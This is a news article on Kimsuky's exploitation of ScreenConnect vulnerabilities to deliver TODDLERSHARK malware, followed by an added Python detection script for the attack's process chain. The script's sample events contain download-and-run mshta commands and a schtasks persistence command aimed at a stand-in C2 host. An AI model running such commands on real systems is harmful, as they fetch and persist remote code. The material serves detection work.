Hackers Exploit ConnectWise ScreenConnect Flaws to Deploy TODDLERSHARK Malware

North Korean threat actors have been exploiting the recently disclosed vulnerabilities in ConnectWise ScreenConnect to deliver a new piece of malware called TODDLERSHARK.

In a report shared with The Hacker News, Kroll said TODDLERSHARK overlaps with known Kimsuky malware, including BabyShark and ReconShark.

Security researchers Dave Truman, George Glass, and Keith Wojcieszek stated that “the threat actor gained access to the victim workstation by exploiting the exposed setup wizard of the ScreenConnect application. They then leveraged their now 'hands on keyboard' access to use cmd.exe to execute mshta.exe with a URL to the Visual Basic (VB) based malware.”

The ScreenConnect vulnerabilities in question, CVE-2024-1709 (an authentication bypass that re-exposes the setup wizard) and CVE-2024-1708 (a path traversal), were disclosed last month and have since been widely exploited by a range of threat actors to deliver ransomware, information stealers, cryptocurrency miners, and remote access trojans.

Kimsuky, also tracked as APT43, ARCHIPELAGO, Black Banshee, Emerald Sleet, KTA082, Nickel Kimball, and Velvet Chollima, has steadily expanded its malware arsenal over time, most recently with GoBear and Troll Stealer.

BabyShark, first observed in late 2018, is launched by way of an HTML Application (HTA) file. Once executed, the VB script-based malware establishes persistence on the system, exfiltrates system information to a command-and-control (C2) server, and waits for further instructions from the operator.

Then, in May 2023, a BabyShark variant dubbed ReconShark was observed being delivered via spear-phishing emails to specifically targeted individuals. Based on its code and behavior, TODDLERSHARK is assessed to be the latest evolution of the same malware.

Along with using a scheduled task for persistence, the malware is designed to capture and exfiltrate sensitive information from the compromised hosts, making it an effective reconnaissance tool.

TODDLERSHARK “exhibits elements of polymorphic behavior in the form of changing identity strings in code, changing the position of code via generated junk code, and using uniquely generated C2 URLs, which could make this malware hard to detect in some environments,” according to the researchers.
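Because the strings, code layout and C2 URLs change from sample to sample, hash- or string-based signatures are the wrong tool here. What does not change is the shape of the intrusion the researchers describe: a ScreenConnect session spawning cmd.exe, cmd.exe launching mshta.exe with a URL argument, and a scheduled task created from that process tree for persistence. The following is an added example, not code from Kroll or the article, that encodes those three behaviors as process-lineage rules and runs them over constructed Sysmon-style process-creation events. The ScreenConnect image names used as the top of the chain, the C2 host, and the task name are assumptions for illustration.

```python
"""Behavioral detection for the ScreenConnect -> cmd.exe -> mshta.exe chain.

Added example (not from the Kroll report). Events are constructed to model
the subset of Sysmon Event ID 1 fields needed for process-lineage rules.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """One process-creation event (subset of Sysmon Event ID 1 fields)."""
    pid: int
    ppid: int
    image: str      # full path of the new process
    cmdline: str    # full command line


# Any http(s) URL in a command line; no attempt to match a specific C2.
URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)

# Assumption: the attacker's interactive ScreenConnect session appears as one
# of these processes at the top of the chain. Image names are illustrative.
SCREENCONNECT_IMAGES = {
    "screenconnect.clientservice.exe",
    "screenconnect.windowsclient.exe",
    "screenconnect.service.exe",
}


def basename(path: str) -> str:
    """Lower-cased file name of a Windows (or POSIX) path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def ancestry(events, pid):
    """Image basenames from `pid` up to the root: self first, then parents."""
    by_pid = {e.pid: e for e in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:  # `seen` guards against PID reuse loops
        seen.add(pid)
        e = by_pid[pid]
        chain.append(basename(e.image))
        pid = e.ppid
    return chain


def detect(events):
    """Return (rule_name, pid) findings; rules use lineage and command-line
    shape only, none of the strings or URLs that vary between samples."""
    findings = []
    for e in events:
        name = basename(e.image)
        parents = ancestry(events, e.pid)[1:]
        # Rule 1: mshta.exe fetching an HTA from a remote URL.
        if name == "mshta.exe" and URL_RE.search(e.cmdline):
            findings.append(("mshta_remote_hta", e.pid))
        # Rule 2: mshta.exe launched via cmd.exe under a ScreenConnect session.
        if name == "mshta.exe" and "cmd.exe" in parents and SCREENCONNECT_IMAGES & set(parents):
            findings.append(("screenconnect_cmd_mshta_chain", e.pid))
        # Rule 3: scheduled task created from a process tree rooted in mshta.exe.
        if name == "schtasks.exe" and "/create" in e.cmdline.lower() and "mshta.exe" in parents:
            findings.append(("schtasks_persistence_from_mshta", e.pid))
    return findings


# Constructed sample telemetry, not real logs. PIDs, paths, the C2 host
# (c2.example.invalid) and the task name are all made up.
SAMPLE_EVENTS = [
    ProcEvent(4, 0, r"C:\Windows\System32\services.exe", "services.exe"),
    ProcEvent(100, 4, r"C:\Program Files (x86)\ScreenConnect Client (abc)\ScreenConnect.ClientService.exe",
              "ScreenConnect.ClientService.exe"),
    ProcEvent(200, 100, r"C:\Windows\System32\cmd.exe",
              "cmd.exe /c mshta.exe http://c2.example.invalid/a1b2c3/sc.hta"),
    ProcEvent(300, 200, r"C:\Windows\System32\mshta.exe",
              "mshta.exe http://c2.example.invalid/a1b2c3/sc.hta"),
    ProcEvent(310, 300, r"C:\Windows\System32\schtasks.exe",
              'schtasks.exe /create /sc minute /mo 15 /tn "WindowsUpdate" /tr "mshta.exe http://c2.example.invalid/d4e5f6"'),
    # Benign control: a local help file opened from explorer.exe, no URL.
    ProcEvent(500, 4, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(510, 500, r"C:\Windows\System32\mshta.exe",
              r'mshta.exe "C:\Program Files\Vendor\Help\index.hta"'),
]


if __name__ == "__main__":
    for rule, pid in detect(SAMPLE_EVENTS):
        print(f"{rule}: pid {pid}")
```

Only the chain rooted at the ScreenConnect process trips the rules; the local HTA launched from explorer.exe does not, because it has neither a URL nor the expected lineage. Rule 1 alone will fire on any mshta.exe-with-URL launch, which is noisy in environments that legitimately use remote HTAs, so in practice rule 2 (lineage) is the higher-confidence signal and rule 1 is the broad net.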

The development comes as South Korea's National Intelligence Service (NIS) accused its northern counterpart of breaching the servers of two unnamed domestic semiconductor manufacturers and stealing sensitive information.

The attacks took place in December 2023 and February 2024. The threat actors are said to have first gained access to internet-facing servers that were known to be vulnerable, then relied on living-off-the-land (LotL) techniques rather than dropping malware in order to evade detection.

“North Korea may have begun preparations for its production of semiconductors due to difficulties in procuring semiconductors due to sanctions against North Korea and increased demand due to the development of weapons such as satellite missiles,” NIS stated.